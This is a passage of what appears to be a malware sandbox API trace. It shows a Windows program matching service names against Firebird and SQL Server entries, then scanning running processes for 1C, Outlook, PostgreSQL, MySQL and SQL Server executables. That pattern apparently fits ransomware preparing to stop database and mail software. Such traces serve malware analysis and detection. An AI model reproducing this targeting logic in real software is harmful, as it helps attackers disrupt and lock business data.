lpString2="LanmanWorkstation") returned -1 [0251.301] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0251.301] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0251.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0251.301] lstrlenW (lpString="lmhosts") returned 7 [0251.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0251.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0251.301] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0251.301] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0251.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0251.301] lstrlenW (lpString="MMCSS") returned 5 [0251.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0251.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0251.301] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0251.301] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0251.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0251.301] lstrlenW (lpString="MpsSvc") returned 6 [0251.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0251.301] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0251.301] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0251.301] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0251.301] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0251.301] lstrlenW (lpString="NlaSvc") returned 6 [0251.301] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0251.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0251.302] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0251.302] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0251.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0251.302] lstrlenW (lpString="nsi") returned 3 [0251.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0251.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0251.302] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0251.302] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0251.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0251.302] lstrlenW (lpString="PcaSvc") returned 6 [0251.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0251.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0251.302] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0251.302] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0251.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0251.302] lstrlenW (lpString="PlugPlay") returned 8 [0251.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0251.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0251.302] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0251.302] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0251.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0251.302] lstrlenW (lpString="Power") returned 5 [0251.302] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0251.302] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0251.302] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0251.302] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0251.302] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0251.303] lstrlenW (lpString="ProfSvc") returned 7 [0251.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0251.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0251.303] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0251.303] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0251.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0251.303] lstrlenW (lpString="RpcEptMapper") returned 12 [0251.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0251.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0251.303] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0251.303] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0251.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0251.303] lstrlenW (lpString="RpcSs") returned 5 [0251.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0251.303] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0251.303] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0251.303] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0251.303] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0251.303] lstrlenW (lpString="SamSs") returned 5 [0251.303] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0251.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0251.304] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0251.304] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0251.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0251.304] lstrlenW (lpString="Schedule") returned 8 [0251.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0251.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0251.304] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0251.304] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0251.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0251.304] lstrlenW (lpString="SENS") returned 4 [0251.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0251.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0251.304] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0251.304] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0251.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0251.304] lstrlenW (lpString="ShellHWDetection") returned 16 [0251.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0251.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0251.304] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0251.304] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0251.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0251.304] lstrlenW (lpString="Spooler") returned 7 [0251.304] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0251.304] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0251.304] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0251.304] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0251.304] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0251.305] lstrlenW (lpString="SysMain") returned 7 [0251.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0251.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0251.305] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0251.305] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0251.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0251.305] lstrlenW (lpString="Themes") returned 6 [0251.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0251.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0251.305] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0251.305] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0251.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0251.305] lstrlenW (lpString="UxSms") returned 5 [0251.305] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0251.305] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0251.305] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0251.305] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0251.305] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0251.305] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dee5b0 | out: hHeap=0xb00000) returned 1 [0251.305] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3ac [0251.306] Process32FirstW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0251.306] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0251.307] lstrlenW (lpString="System") returned 6 [0251.307] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0251.307] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0251.307] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0251.307] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0251.307] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0251.307] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0251.307] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0251.307] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0251.307] lstrlenW (lpString="smss.exe") returned 8 [0251.307] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0251.307] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0251.307] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0251.307] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0251.307] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0251.307] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0251.307] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0251.307] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.308] lstrlenW (lpString="csrss.exe") returned 9 [0251.308] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0251.308] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0251.308] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0251.308] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0251.308] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0251.308] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0251.308] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0251.308] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0251.308] lstrlenW (lpString="wininit.exe") returned 11 [0251.308] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0251.308] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0251.308] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0251.308] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0251.308] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0251.308] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0251.308] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0251.308] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x18c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.309] lstrlenW (lpString="csrss.exe") returned 9 [0251.309] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0251.309] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0251.309] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0251.309] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0251.309] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0251.309] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0251.309] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0251.309] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0251.309] lstrlenW (lpString="winlogon.exe") returned 12 [0251.309] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0251.309] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0251.309] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0251.309] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0251.310] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0251.310] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0251.310] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0251.310] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0251.310] lstrlenW (lpString="services.exe") returned 12 [0251.310] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0251.310] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0251.310] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0251.310] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0251.310] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0251.310] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0251.310] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0251.310] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x180, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0251.310] lstrlenW (lpString="lsass.exe") returned 9 [0251.310] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0251.310] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0251.310] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0251.310] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0251.310] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0251.311] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0251.311] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0251.311] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x180, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0251.311] lstrlenW (lpString="lsm.exe") returned 7 [0251.311] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0251.311] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0251.311] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0251.311] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0251.311] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0251.311] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0251.311] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0251.311] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.311] lstrlenW (lpString="svchost.exe") returned 11 [0251.311] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0251.311] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0251.311] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0251.311] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0251.311] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0251.311] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0251.312] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.312] lstrlenW (lpString="svchost.exe") returned 11 [0251.312] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0251.312] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.312] lstrlenW (lpString="svchost.exe") returned 11 [0251.312] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0251.312] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0251.313] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.313] lstrlenW (lpString="svchost.exe") returned 11 [0251.313] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0251.313] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0251.313] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0251.313] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0251.313] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0251.313] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.313] lstrlenW (lpString="svchost.exe") returned 11 [0251.313] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0251.314] lstrlenW (lpString="audiodg.exe") returned 11 [0251.314] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.314] lstrlenW (lpString="svchost.exe") returned 11 [0251.314] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.314] lstrlenW (lpString="svchost.exe") returned 11 [0251.314] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0251.315] lstrlenW (lpString="userinit.exe") returned 12 [0251.315] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0251.315] lstrlenW (lpString="dwm.exe") returned 7 [0251.315] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0251.315] lstrlenW (lpString="explorer.exe") returned 12 [0251.315] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0251.316] lstrlenW (lpString="spoolsv.exe") returned 11 [0251.316] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0251.316] lstrlenW (lpString="taskhost.exe") returned 12 [0251.316] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.317] lstrlenW (lpString="svchost.exe") returned 11 [0251.317] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0251.317] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0251.317] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0251.317] lstrlenW (lpString="reader_sl.exe") returned 13 [0251.317] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0251.318] lstrlenW (lpString="dllhost.exe") returned 11 [0251.318] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, 